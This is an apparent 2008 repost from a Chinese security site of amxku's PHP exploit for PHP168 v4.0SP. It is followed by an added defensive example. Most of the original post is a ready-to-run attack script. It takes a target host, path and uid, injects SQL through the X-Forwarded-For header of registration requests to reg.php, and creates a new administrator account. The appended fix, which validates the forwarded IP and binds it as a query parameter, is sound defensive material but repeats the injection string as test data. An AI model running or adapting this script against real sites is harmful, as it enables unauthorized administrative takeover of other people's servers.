myhack58 | Anonymous | MYHACK58:62200819381
Jun 17, 2008 - 12:00 a.m.

PHP168 X-Forwarded-For exploit - vulnerability warning - the black bar safety net

www.myhack58.com

amxku’s blog ( http://www.amxku.net/ )

author: amxku

There is not much to say about the cause of the vulnerability itself; it is the old X-Forwarded-For problem, and I think a lot of people have already found this hole. Because this vulnerability has been around for some time, and I only tested it on my own PC, there may be some errors; interested readers can research it themselves.

<?php
// Banner
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit For php168 v4.0SP\n
amxku.net
+------------------------------------------------------------------+
");

// Usage: host, path and uid are required
if ($argc<4) {
    echo "Usage: php ".$argv[0]." host path uid\n";
    echo "host: target server \n";
    echo "path: path to php168\n";
    echo "uid: the user uid\n";
    echo "Example:";
    echo "php ".$argv[0]." www.php168.com / 1 2 3 3 4 5\n";
    die;
}

$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;

// SQL fragment carried in the X-Forwarded-For header
$cmd = "xxxx','0','1 1 1','0','1',", ", '1 2 3', '1 2 3', '1 2 3', '1 2 3', '0', ", '0', ", ", ", "),('".$id."', '0', '3', ", '1', '0', ", '1', '1', '1', '1', '1', '1', '1', ", ", '1', '1', '1', '1', '0', ", '0', ", ", ", ")/*";

// Registration form bodies posted to reg.php
$content_1= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";
$content_2= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";

senddate($content_1);
senddate($content_2);

// Send one registration request with the crafted header
function senddate($content){
    global $path,$host,$cmd;
    $data = "POST ".$path."reg.php"." HTTP/1.1";
    $data .= "Accept: */*";
    $data .= "Accept-Language: zh-cn";
    $data .= "Content-Type: application/x-www-form-urlencoded";
    $data .= "User-Agent: Mozilla/4.0";
    $data .= "Host: ".$host."";
    $data .= "X-FORWARDED-FOR: ".$cmd."";
    $data .= "Content-length: ".strlen($content)."";
    $data .= "Connection: Keep-Alive";
    $data .= "";
    $data .= $content."";
    $sendto=fsockopen($host,80);
    if (!$sendto) {
        echo 'No response from '.$host;
        die;
    }
    fputs($sendto,$data);
    fclose($sendto);
};

echo "Create a successful administrator\n amxku.net";
?>
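
The defensive counterpart to the exploit above, as an added example that is not part of the original post and not PHP168's own code: it assumes the registration handler copies the X-Forwarded-For header into an SQL INSERT, and shows the header being accepted only from a trusted proxy, validated as an IP address, and bound as a query parameter. The names client_ip, register_member, TRUSTED_PROXIES and the members table are hypothetical, and the request values are constructed.

```php
<?php
// Added example, not PHP168 code. Hypothetical names: client_ip(),
// register_member(), TRUSTED_PROXIES, table "members".

const TRUSTED_PROXIES = ['127.0.0.1'];   // assumption: your own reverse proxies

/** Return a validated client IP, never the raw header string. */
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    // Only a trusted proxy may speak for the client; otherwise ignore the header.
    if ($xff === '' || !in_array($peer, TRUSTED_PROXIES, true)) {
        return $peer;
    }
    // Proxies append entries, so the right-most one is what our proxy observed.
    $parts = explode(',', $xff);
    $candidate = trim(end($parts));
    // Anything that is not a literal IPv4/IPv6 address is discarded.
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : $peer;
}

function register_member(PDO $db, string $username, string $ip): void
{
    // Bound parameters: the IP is data and never becomes part of the SQL text.
    $stmt = $db->prepare('INSERT INTO members (username, regip) VALUES (?, ?)');
    $stmt->execute([$username, $ip]);
}

// Constructed demo: in-memory database and three constructed requests.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (username TEXT, regip TEXT)');

$requests = [
    // Direct client sending a quote-breaking header: header ignored.
    ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => "x','0'),('9','3')/*"],
    // Same header relayed by the trusted proxy: fails IP validation.
    ['REMOTE_ADDR' => '127.0.0.1',   'HTTP_X_FORWARDED_FOR' => "x','0'),('9','3')/*"],
    // Well-formed header relayed by the trusted proxy: accepted.
    ['REMOTE_ADDR' => '127.0.0.1',   'HTTP_X_FORWARDED_FOR' => '198.51.100.7'],
];
foreach ($requests as $i => $server) {
    register_member($db, "user$i", client_ip($server));
}
foreach ($db->query('SELECT username, regip FROM members', PDO::FETCH_ASSOC) as $row) {
    echo implode(' | ', $row), "\n";
}
```

Each request produces exactly one row whose regip is a syntactically valid address, so a header value shaped like the one in the exploit never reaches the SQL text.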